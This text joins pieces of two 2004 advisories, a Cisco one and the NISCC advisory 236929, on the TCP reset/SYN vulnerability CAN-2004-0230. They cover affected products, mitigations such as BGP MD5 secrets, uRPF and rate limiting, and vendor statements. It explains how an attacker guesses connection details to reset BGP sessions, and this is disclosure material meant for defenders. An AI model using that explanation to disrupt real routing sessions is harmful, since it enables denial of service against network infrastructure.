maintenance | | releases, and may have serious bugs. | +------------------------------------------------+ Obtaining Fixed Software ======================== Customers with Service Contracts Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third-party Support Organizations Customers whose Cisco products are provided or maintained through prior or existing agreement with third-party support organizations such as Cisco Partners, authorized resellers, or service providers should contact that support organization for assistance with the upgrade, which should be free of charge. Customers without Service Contracts Customers who purchase direct from Cisco but who do not hold a Cisco service contract and customers who purchase through third-party vendors but are unsuccessful at obtaining fixed software through their point of sale should get their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com See http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including special localized telephone numbers and instructions and e-mail addresses for use in various languages. Please have your product serial number available and give the URL of this notice as evidence of your entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Please do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software upgrades. Workarounds =========== The effectiveness of any workaround is dependent on specific customer situations such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround is the most appropriate for use in the intended network before it is deployed. There are no workarounds available to mitigate the effects of this vulnerability on Cisco IOS Firewall. For BGP, we will present the workaround and only a few mitigation techniques. For additional information regarding BGP security risk assessment, mitigation techniques, and deployment best practices, please consult ftp://ftp-eng.cisco.com/cons/isp/security/ BGP-Risk-Assesment-v.pdf. * BGP MD5 secret The workaround for BGP is to configure MD5 secret for each session between peers. This can be configured as shown in the following example: router(config)#router bgp <AS-_number> router(config-router)#neighbor <IP_address> password <enter_your_secret_here> It is necessary to configure the same shared MD5 secret on both peers and at the same time. Failure to do so will break the existing BGP session and the new session will not get established until the exact same secret is configured on both devices. For a detailed discussion on how to configure BGP, refer to the following document http://www.cisco.com/en/US/products/sw/iosswrel/ps1828/ products_configuration_guide_chapter09186a00800ca571.html . Once the secret is configured, it is prudent to change it periodically. The exact period must fit within your company security policy but it should not be longer than a few months. When changing the secret, again it must be done at the same time on both devices. Failure to do so will break your existing BGP session. The exception is if your Cisco IOS software release contains the integrated CSCdx23494 ( registered customers only) fix. With this fix, the BGP session will not be terminated when the MD5 secret is changed only on one side. The BGP updates, however, will not be processed until either the same secret is configured on both devices or the secret is removed from both devices. It is possible to mitigate the exposure for BGP on this vulnerability by applying one or more of the following measures which will lessen the potential for the necessary spoofing required to implement a successful attack: * Blocking access to the core infrastructure Although it is often difficult to block traffic transiting your network, it is possible to identify traffic which should never be allowed to target your infrastructure devices and block that traffic at the border of your network. Infrastructure access control lists (ACLs) are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The white paper entitled "Protecting Your Core: Infrastructure Protection Access Control Lists", available at http://www.cisco.com/warp/public/707/ iacl.html, presents guidelines and recommended deployment techniques for infrastructure protection ACLs. Exceptions would include any devices which have a legitimate reason to access your infrastructure (for example, BGP peers, NTP sources, DNS serves, and so on). All other traffic must be able to traverse your network without terminating on any of your devices. * Configure anti-spoofing measures on the network edge In order for an adversary to use the attack vector described in this advisory, it must send packets with the source IP address equal to one of the BGP peers. You can block spoofed packets either using the Unicast Reverse Path Forwarding (uRPF) feature or by using access control lists (ACLs). By enabling uRPF, all spoofed packets will be dropped at the first device. To enable uRPF, use the following commands: router(config)#ip cef router(config)#ip verify unicast reverse-path Please consult http://www.cisco.com/en/US/products/sw/iosswrel/ps1835 /products_configuration_guide_chapter09186a00800ca7d4.html and ftp:// ftp-eng.cisco.com/cons/isp/security/URPF-ISP.pdf for further details on how uRPF works and how to configure it in various scenarios. This is especially important if you are using asymmetric routing. ACLs should also be deployed as close to the edge as possible. Unlike uRPF, you must specify the exact IP range that is permitted. Specifying which addresses should be blocked is not the optimal solution because it tends to be harder to maintain. Caution: In order for anti-spoofing measures to be effective, they must be deployed at least one hop away from the devices which are being protected. Ideally, they will be deployed at the network edge facing your customers. * Packet rate limiting RST packets are rate-limited in Cisco IOS software by default. This feature is introduced in Cisco IOS Software Release 10.2. In the case of a storm of RST packets, they are effectively limited to one packet per second. In order to be successful, an attacker must terminate connection with the first few packets. Otherwise, the attack is deemed to be impracticably long. On the other hand, SYN packets are not rate-limited in any way. Rate limiting can be accomplished either by using Committed Access Rate (CAR) or by Control Plane Policing (CPP). While CPP is the recommended approach, it is available only for Cisco IOS Software Releases 12.2(18)S and 12.3(4)T. It is currently supported only on the following routers: 1751, 2600/2600-XM, 3700, 7200, and 7500 Series. CAR can be configured as follows: router(config)#access-list 103 deny tcp any host 10.1.1.1 established router(config)#access-list 103 permit tcp any host 10.0.0.1 router(config)#interface <interface> <interface #> router(config-if)#rate-limit input access-group 103 8000 8000 8000 conform-action transmit exceed-action drop For details on how to configure and deploy CPP, please consult the following document http://www.cisco.com/en/US/products/sw/iosswrel/ ps1838/products_white_paper09186a0080211f39.shtml Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. The exploitation of the vulnerability with packets having RST flag set (reset packets) was discovered by Paul (Tony) Watson of OSVDB.org. The extension of the attack vector to packets with SYN flag was discovered by the vendors cooperating on the resolution of this issue. Status of This Notice: INTERIM ============================== This is a INTERIM advisory. Although Cisco cannot guarantee the accuracy of all statements in this advisory, all of the facts have been checked to the best of our ability. Cisco does not anticipate issuing updated versions of this advisory unless there is some material change in the facts. Should there be a significant change in the facts, Cisco may update this advisory. A stand-alone copy or Paraphrase of the text of this Security Advisory that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory will be posted on Cisco's worldwide website at http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml. In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org (includes CERT/CC) * bugtraq@securityfocus.com * vulnwatch@wulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.netsys.com * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------+-------------+----------------+ | Revision | 2004-Apr-20 | Initial public | | 1.0 | | release. | +----------+-------------+----------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/warp/public/707/ sec_incident_response.shtml. This includes instructions for press inquiries regarding Cisco Security Notices. All Cisco Security Advisories are available at http://www.cisco.com/go/psirt. - ------------------------------------------------------------------------- All contents are Copyright \xa9 1992-2004 Cisco Systems, Inc. All rights reserved. Important Notices and Privacy Statement. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (Cygwin) iD8DBQFAhZTpezGozzK2tZARAkKXAJ9BWwuytT7zwoOL+RkZJPebYN3W3ACfV/+K 0Fd3MvvRlKSETCrlMGL/dZg= =eDSn -----END PGP SIGNATURE----- . The nonexhaustive list of vulnerable non-IOS based Cisco products is as follows: * Access Registrar * BPX, IGX, MGX WAN switches, and the Service Expansion Shelf * BR340, WGB340, AP340, AP350, BR350 Cisco/Aironet wireless products * Cache Engine 505 and 570 * CallManager * Catalyst 1200, 1900, 28xx, 29xx, 3000, 3900, 4000, 5000, 6000 * Cisco 8110 Broadband Network Termination Unit * Cisco Element Management Framework * Cisco Info Center * Cisco Intelligent Contact Management * Cisco MDS 9000 * Cisco ONS 15190/15194 IP Transport Concentrator * Cisco ONS 15327 Metro Edge Optical Transport Platform * Cisco ONS 15454 Optical Transport Platform * Cisco ONS 15531/15532 T31 OMDS Metro WDM System * Cisco ONS 15800/15801/15808 Dense Wave Division Multiplexing Platform * Cisco ONS 15830 T30 Optical Amplification System * Cisco ONS 15831/15832 T31 DWDM System * Cisco ONS 15863 T31 Submarine WDM System * Content Router 4430 and Content Delivery Manager 4630 and 4650 * Cisco Secure Intrusion Detection System (NetRanger) appliance and IDS Module * Cisco Secure PIX firewall * Cisco ws-x6608 and ws-x6624 IP Telephony Modules * CiscoWorks Windows * Content Engine 507, 560, 590, and 7320 * CSS11000 (Arrowpoint) Content Services Switch * Hosting Solution Engine * User Registration Tool VLAN Policy Server * Cisco FastHub 300 and 400 * CR-4430-B * Device Fault Manager * Internet CDN Content Engine 590 and 7320, Content Distribution Manager 4670, and Content Router 4450 * IP Phone (all models including ATA and VG248) * IP/TV * LightStream 1010 * LightStream 100 ATM Switches * LocalDirector * ME1100 series * MicroHub 1500,MicroSwitch 1538/1548 * Voice Manager * RTM * SN5400 series storage routers * Switch Probe * Unity Server * VG248 Analog Phone Gateway * Traffic Director * WAN Manager Products Confirmed Not Vulnerable ================================= The following products are not vulnerable: * Cisco VPN 3000 Series Concentrators * Cisco Firewall Services Module for Cisco Catalyst 6500 Series and Cisco 7600 Series (FWSM) Details ====== TCP is the transport layer protocol designed to provide connection-oriented reliable delivery of a data stream. The Cisco PSIRT has analyzed multiple TCP-based protocols, as they are used within our offering, and we believe that this vulnerability does not have a significant impact on them. We will present our analysis for a few protocols which have the potential for higher impact due to the long lived connections. Voice signaling H.225, H.245 (part of H.323 suite) - -------------------------------------------------- H.225 and H.245 protocols are used in voice signaling. Their purpose is to negotiate parameters for content transfer (voice or video). The established sessions persist for the duration of a call. Any call in progress is terminated when the signaling session is broken. A new signaling session will be established immediately for the new call, but terminated calls cannot be re-established. Each call from an IP telephone or softphone will result in the creation of a single signaling session. It is possible that a single signaling session is responsible for multiple calls, but that setup is used deeper within the Service Provider's network. Determining all necessary parameters for mounting an attack is deemed a non-trivial task if the network is designed according to the current best practices. Network Storage (iSCSI, FCIP) - ----------------------------- Network Storage products use two TCP-based protocols: SCSI over IP (iSCSI) and Fiber Channel over IP (FCIP). * SCSI over IP (iSCSI) iSCSI is used in a client/server environment. The client is your computer and it is only the client that initiates a connection. This connection is not shared with any other users. Terminating the session will not have any adverse consequences if people are using current drivers from Microsoft for Windows and from Cisco for Linux. These drivers will re-establish the session and continue transfer from the point where it was disconnected. Drivers from other vendors may behave differently. The user may notice that access to a virtual device is slightly slower than usual. * Fiber Channel over IP (FCIP) FCIP is a peer-to-peer protocol. It is used for mirroring data between switches. Each peer can initiate the session. Switches can, and should be in practice, configured in a mesh. Bringing one link down will cause traffic to be re-routed over other link(s). If an adversary can manage to terminate the session multiple times in a row, the user's application may terminate with a "Device unreachable" or similar error message. This does not have any influence on the switch itself and the user can retry the operation. The user may notice that access to a virtual device is slightly slower than usual. An occasional error message is possible. SSL/TLS connections can be used to encapsulate various kinds of traffic and these sessions can be long lived. An encrypted session can be attacked either on the originating or terminating host or on the firewalls in front of them (if they exist). | | | | Customers | | | | are | | | | encouraged | | | | to migrate | | | | to IOS. <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>NISCC Vulnerability Advisory 236929</title> <style> <!-- body { font-family: Verdana } --> </style> </head> <body bgcolor="#FFFFCC"> <div class=Section1 style="width: 100%;"> <div align="center"><img src="http://www.niscc.gov.uk/images/newtitle.gif" width="766" height="80" alt="National Infrastructure Security Co-Ordination Centre"></div> <br> <font size="4"><b><font color="#FF0000">NISCC Vulnerability Advisory 236929</b></font><br> <br> <b>Vulnerability Issues in TCP</b></font><br> <br> <br> <b><font size="3">Version</font> Information</b> <br><br> <table border="1" width="61%"> <tr> <td width="58%">Advisory Reference</td> <td width="77%">236929</td> </tr> <tr> <td width="58%">Release Date</td> <td width="77%">20 April 2004</td> </tr> <tr> <td width="58%">Last Revision</td> <td width="77%">22 April 2004</td> </tr> <tr> <td width="58%">Version Number</td> <td width="77%">1.4</td> </tr> </table> &nbsp;<br><br> <b>What is Affected?</b><br> <br> The vulnerability described in this advisory affects implementations of the Transmission Control Protocol (TCP) that comply with the Internet Engineering Task Force\x92s (IETF\x92s) Requests For Comments (RFCs) for TCP, including <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, the original specification, and <a href="http://www.ietf.org/rfc/rfc1323.txt">RFC 1323</a>, TCP Extensions for High Performance.<br> <br> TCP is a core network protocol used in the majority of networked computer systems today. Many vendors include support for this protocol in their products and may be impacted to varying degrees. <br> <br> <br> <b>Severity</b><br> <br> The impact of this vulnerability varies by vendor and application, but in some deployment scenarios it is rated critical. Alternatively contact your vendor for product specific information.<br> <br> If exploited, the vulnerability could allow an attacker to create a Denial of Service condition against existing TCP connections, resulting in premature session termination. The resulting session termination will affect the application layer, the nature and severity of the effects being dependent on the application layer protocol. The primary dependency is on the duration of the TCP connection, with a further dependency on knowledge of the network (IP) addresses of the end points of the TCP connection.<br> <br> The Border Gateway Protocol (BGP) is judged to be potentially most affected by this vulnerability.<br> <br> BGP relies on a persistent TCP session between BGP peers. Resetting the connection can result in medium term unavailability due to the need to rebuild routing tables and route flapping.&nbsp; Route flapping may result in route dampening (suppression) if the route flaps occur frequently within a short time interval.&nbsp; The overall impact on BGP is likely to be moderate based on the likelihood of successful attack. If the TCP MD5 Signature Option and anti-spoofing measures are used then the impact will be low as these measures will successfully mitigate the vulnerability.<br> <br> There is a potential impact on other application protocols such as DNS (Domain Name System) and SSL (Secure Sockets Layer) in the case of zone transfers and ecommerce transactions respectively, but the duration of the sessions is relatively short and the sessions can be restarted without medium term unavailability problems. In the case of SSL it may be difficult to guess the source IP address.<br> <br> Data injection may be possible. However, this has not been demonstrated and appears to be problematic. The reason for this is that the receiving TCP implementation checks the sequence number of the RST or SYN packet, which is a 32 bit number, giving a probability of 1/2^{<font size="2">32</font>} of guessing the sequence number correctly (assuming a random distribution).<br> <br> The discoverer of the practicability of the RST attack was Paul A. Watson, who describes his research in his paper \x93Slipping In The Window: TCP Reset Attacks\x94, presented at the CanSecWest 2004 conference. In a RST/ACK packet an acknowledgement number is included in the packet, although it is not checked by the receiving TCP implementation.)<br> <br> <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, p36, states the following:<br> <br> &quot;In all states except SYN-SENT, all reset (RST) segments are validated by checking their SEQ-fields [sequence numbers]. In the SYN-SENT state (a RST received in response to an initial SYN), the RST is acceptable if the ACK field acknowledges the SYN.&quot;<br> <br> Resets must be processed immediately. <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, p25, says &quot;[\x85] [E]ven when the receive window is zero, a TCP must process the RST and URG fields of all incoming segments.&quot;<br> <br> It is also possible to perform the same attack with SYN (synchronise) packets. <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, p31 states:<br> <br> \x93The principle reason for the three-way handshake is to prevent old duplicate connection initiations from causing confusion. To deal with this, a special control message, reset, has been devised. [\x85] If the TCP is in one of the synchronized states (ESTABLISHED, FIN-WAIT-1, FIN-WAIT-2, CLOSE-WAIT, CLOSING, LAST-ACK, TIME-WAIT), it aborts the connection and informs its user.\x94<br> <br> TCP window sizes are negotiated in the initial 3-way handshake used to set up a TCP connection, with higher values serving to improve throughput in some circumstances. Vendor-chosen defaults also influence the selection. An attacker seeking to disrupt an existing TCP connection must supply the 4-tuple correctly. As the source port varies, additional work is generally called for on the part of the attacker. However, research (referenced below) has shown that the process of source port selection on many platforms includes predictable elements, so that the attack remains practicable. By weighting 'likely' source port values carefully, an attacker can disrupt TCP implementations that employ a range of window sizes.<br> <br> Application layer protocols that are critically affected are those that:<br> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Depend on long lived TCP connections</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Have known or easy-to-guess IP address end points</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Have easy to an easy-to-guess source TCP port</td> </tr> </table> <p>As noted above BGP does use long lived TCP connections, and the IP addresses and source port (and destination port) are sometimes available through the use of BGP looking glasses (multi-source, multi-destination trace route tools) or DNS resource records. Using \x93trace route\x94 commands can provide information on peering point IP addresses. Thus BGP is likely to be critically affected by the TCP vulnerability.<br> <br> These denial of service attacks can be carried out by single machine, or by multiple co-operating systems (to form a distributed denial of service attack).<br> <br> It is also possible to inject packets, which will be processed if they are in the window. The difficulty with data injection attacks is that the receiving TCP implementation will reassemble the packets received according to sequence number, dropping any duplicate packets.<br> <br> <br> Vendor specific information will be released as it becomes available and if vendor permission has been received. Subscribers are advised to check the following URL regularly for updates:<br> <br> <a href="http://www.uniras.gov.uk/vuls/2004/236929/index.htm">http://www.uniras.gov.uk/vuls/2004/236929/index.htm</a><br> <br> <i>[Please note that updates to this advisory will not be notified by email.]</i><br> <br> This vulnerability has been assigned the <a href="http://cve.mitre.org/cve">CVE</a> name <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230">CAN-2004-0230</a>.<br> <br> The <a href="http://www.osvdb.org">Open Source Vulnerability Database</a> ID number for this vulnerability is <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=4030">4030</a>.<br> <br> <br> <b>Mitigation</b><br> <br> The following mitigation steps are still being evaluated and may be incomplete. Customers should work with vendors for the workaround most appropriate for the product in question.<br> <br> In the absence of vendor patching of the TCP implementation, the following are general mitigating steps:<br> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="97%">Implement IP Security (IPSEC) which will encrypt traffic at the network layer, so TCP information will not be visible</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="97%">Reduce the TCP window size (although this could increase traffic loss and subsequent retransmission)</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="97%">Do not publish TCP source port information</td> </tr> </table> <p>It should be noted that IPSEC provides confidentiality and authentication services at the network layer, and can provide a measure of trust in the authenticity of the end points as well as encryption of traffic between the end points.&nbsp; However, in the context of the current attack IPSEC will reject RST and SYN packets that are not part of a secure IP packet stream.<br> <br> To change the TCP window size, in some Unix variants you can set a value of the default TCP windows size by using the \x93sysctl\x94 program (\x93ndd -set\x94 in the case of Sun Solaris). In the case of Microsoft Windows NT/2000/XP/2003, the default window size can be changed by modifying the value of the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters key. As noted above, great care should be exercised when altering the default TCP window size as network performance could be adversely affected.<br> <br> In the case of BGP, the following may counter the problem:<br> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber5"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Implement ingress and egress filtering to check that the traffic entering or leaving the network has a source IP address that is expected on the router/firewall interface that receives the traffic</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Implement the TCP MD5 Signature Option to checksum the TCP packet carrying the BGP application data (see <a href="http://www.ietf.org/rfc/rfc2385.txt">RFC 2385</a>), being careful to set and maintain strong (i.e. difficult to guess) passwords to which the MD5 checksum is applied.&nbsp; Also see <a href="http://www.ietf.org/rfc/rfc3562.txt">RFC 3562</a> which discusses the security requirements of this keying material.</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Limit the amount of information available through looking glasses and DNS resource records, being careful not to expose TCP port information unnecessarily</td> </tr> </table> <p> The IETF ingress filtering standard is defined in <a href="http://www.ietf.org/rfc/rfc2827.txt">RFC 2827</a>. A discussion of egress filtering can be found at <a href="http://www.sans.org/y2k/egress.htm">http://www.sans.org/y2k/egress.htm</a>.<br> <br> The use of the TCP MD5 Signature Option will prevent the exploitation of this vulnerability. Router customers should implement this on all BGP peering points if it is supported by the router, upgrading the router firmware if necessary.<br> <br> <br> <b>Solution</b><br> <br> Please refer to the Vendor Information section of this advisory for implementation specific remediation.<br> <br> Some vendors will have reduced the likelihood of successful denial of service by amending the TCP implementation to issue a further acknowledgment packet challenge for RST and SYN packets that do not have exactly the expected sequence number.<br> <br> <a href="http://www.ietf.org">The Internet Engineering Task Force</a> (IETF) has published an Internet Draft to co-incide with the release of this advisory.&nbsp; The text of this draft is available from the IETF web site:<br> <a href="http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt">http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt</a><br> <br> NISCC has produced best practice guidelines for BGP available at<br> <a href="http://www.niscc.gov.uk/BGP%20Filtering%20Guide.pdf">http://www.niscc.gov.uk/BGP Filtering Guide.pdf</a><br> <br> Secure configuration templates for BGP implementations on Cisco IOS and Juniper JUNOS can be found at:<br> <br> <table border="0" cellpadding="4" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> <tr> <td width="3%">\x95 </td> <td width="11%">Cisco </td> <td width="99%"><a href="http://www.cymru.com/Documents/secure-bgp-template.html">http://www.cymru.com/Documents/secure-bgp-template.html </a></td> </tr> <tr> <td width="3%">\x95 </td> <td width="11%">Juniper </td> <td width="99%"> <a href="http://www.qorbit.net/documents/junos-bgp-template.pdf">http://www.qorbit.net/documents/junos-bgp-template.pdf </a> </td> </tr> </table> <p> Guidance on tuning of the IP stack for a number of different UNIX operating systems is available at <a href="http://www.cymru.com/Documents/ip-stack-tuning.html">http://www.cymru.com/Documents/ip-stack-tuning.html </a> <br> <br> <br> <B>Vendor Information</B> <br> <br> The following vendors have provided information about how their products are affected by these vulnerabilities.<br> <br> <i><font size="2">Please note that <a href="http://www.jpcert.or.jp">JPCERT/CC</a> have released a Japanese language advisory for this vulnerability which contains additional information regarding Japanese vendors. This advisory is available at <a href="http://www.jpcert.or.jp/at/2004/at040003.txt">http://www.jpcert.or.jp/at/2004/at040003.txt</a>.</font></i><br> <br> </p> </p> </p> <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1"> <tr> <td width="33%"><font size="2"><a href="#certicom">Certicom</a></font></td> <td width="33%"><font size="2"><a href="#iij">Internet Initiative Japan, Inc</a></font></td> <td width="34%"><font size="2"><a href="#nec">NEC</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#checkpoint">Check Point</a></font></td> <td width="33%"><font size="2"><a href="#interniche">InterNiche</a></font></td> <td width="34%"><font size="2"><a href="#nortel">Nortel</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#cisco">Cisco</a></font></td> <td width="33%"><font size="2"><a href="#juniper">Juniper Networks</a></font></td> <td width="34%"><font size="2"><a href="#polycom">Polycom</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#cray">Cray Inc</a></font></td> <td width="33%"><font size="2"><a href="#lucent">Lucent Technologies</a></font></td> <td width="34%"><font size="2"><a href="#seccomp">Secure Computing Corporation</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#hitachi">Hitachi</a></font></td> <td width="33%"><font size="2"><a href="#mitel">Mitel Networks</a></font></td> <td width="34%"><font size="2"><a href="#yamaha">Yamaha</a></font></td> </tr> <tr> <td width="33%"><font size="2"><a href="#innovaphone">Innovaphone</a></font></td> <td width="33%"><font size="2"><a href="#mrlg">MRLG</a></font></td> <td width="34%">&nbsp;</td> </tr> </table> </p> <br> <table border="0" width="100%" cellpadding="8" cellspacing="0"> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="certicom"></a>Certicom</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Certicom has examined the National Infrastructure Security Coordination Centre (NISCC) advisory and determined it is not vulnerable.<br> <br>Certicom Developer Toolkits for SSL (SSL Plus, SSL Plus for Java, Security Builder SSL-C and Security Builder SSL-J) do not provide a TCP/IP transport mechanism, but rather utilize the supported operating system's TCP/IP stack. The vulnerability is against the TCP/IP stack itself, and not directly against the functionality offered by Certicom toolkits. Therefore, there is no patch or workaround that can be implemented within Certicom products. The patch or workaround must be provided by the operating system vendor.<br> <br> Customers are urged to contact their operating system vendors to determine if they have provided a workaround to this advisory. If you have any further questions please do not hesitate to contact <a href="mailto:support@certicom.com">support@certicom.com</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"><u><a name="checkpoint"></a> Check Point</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">The latest release for VPN-1/FireWall-1 (R55 HFA-03) contains a protection against this vulnerability.&nbsp; The protection applies to both the firewall device and to hosts behind the firewall.<br> <br> Please refer to the Check Point web site for further information at:<br> <a HREF="http://www.checkpoint.com/techsupport/alerts/tcp_dos.html"> http://www.checkpoint.com/techsupport/alerts/tcp_dos.html</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="cisco"></a>Cisco</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Cisco Systems is addressing the vulnerabilities identified by NISCC Vulnerability Advisory 236929 across its entire product line.&nbsp; Cisco has released two related advisories:<br> <br> TCP Vulnerabilities in Multiple IOS-Based Cisco Products<br> <a href="http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml">http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-ios.shtml</a><br> <br> TCP Vulnerabilities in Multiple Non-IOS Cisco Products<br> <a href="http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml">http://www.cisco.com/warp/public/707/cisco-sa-20040420-tcp-nonios.shtml</a></td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="cray"></a>Cray Inc</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">Cray Inc. is vulnerable on their UNICOS, UNICOS/mk and UNICOS/mp systems.&nbsp; Spr's have been opened to track this issue.&nbsp; Please contact your local Cray Service Representative for more information.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="hitachi"></a>Hitachi</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Hitachi is investigating the potential impact to Hitachi's products.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="innovaphone"></a>Innovaphone</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf"> Not vulnerable.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="iij"></a>Internet Initiative Japan, Inc (IIJ)</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> IIJ will release a new firmware to fix this vulnerability.&nbsp; Details are available on their web site at <a href="http://www.seil.jp/en/ann/announce_en_20040421_01.txt"> http://www.seil.jp/en/ann/announce_en_20040421_01.txt</a>.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="interniche"></a>InterNiche</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">=== NicheStack v2.0 TCP/IP ===<br> <br> InterNiche Technologies has updated its NicheStack v2.0 TCP/IP product to handle the scenarios described in NISCC Vulnerability Notice #236929.&nbsp; The patch is available to all InterNiche customers in accordance with the terms of their current support agreements.<br> <br> More information can be found on <a href="http://www.iNiche.com">www.iNiche.com</a> or through <a href="mailto:support@iNiche.com">support@iNiche.com</a> <br><br><br> === NicheLite v2.0 TCP/IP ===<br> <br> InterNiche Technologies has updated its NicheLite v2.0 TCP/IP product to handle the scenarios described in NISCC Vulnerability Notice #236929.&nbsp; The patch is available to all InterNiche customers in accordance with the terms of their current support agreements. <br> <br> More information can be found on <a href="http://www.iNiche.com">www.iNiche.com</a> or through <a href="mailto:support@iNiche.com">support@iNiche.com</a> </td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="juniper"></a> Juniper Networks</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Juniper Networks products are susceptible to this vulnerability. Customers should contact Juniper Networks Technical Assistance Center for availability and download instructions.<br> <br>Additional information is posted on our web site at <a href="https://www.juniper.net/support">https://www.juniper.net/support</a>. </td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="lucent"></a>Lucent Technologies</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" bgcolor="#FFFFaf">Lucent Technologies is aware of this vulnerability advisory and is investigating any potential impact to its product portfolio. As further information becomes available, Lucent will provide information directly to its customers, if appropriate.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFbe"> <u><a name="mitel"></a>Mitel Networks</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFbe"> &nbsp;</td> <td width="97%" bgcolor="#FFFFbe"> Mitel is aware of the vulnerability and is working with the vendors of our underlying networking software to assess the impact and, if necessary, determine potential solutions. When more information becomes available, an advisory will be issued. Please contact '<a href="mailto:security@mitel.com">security@mitel.com</a>' if you have specific questions.</td> </tr> <tr> <td width="100%" colspan="2" bgcolor="#FFFFaf"> <u><a name="mrlg"></a>MRLG</u></td> </tr> <tr> <td width="3%" bgcolor="#FFFFaf">&nbsp;</td> <td width="97%" 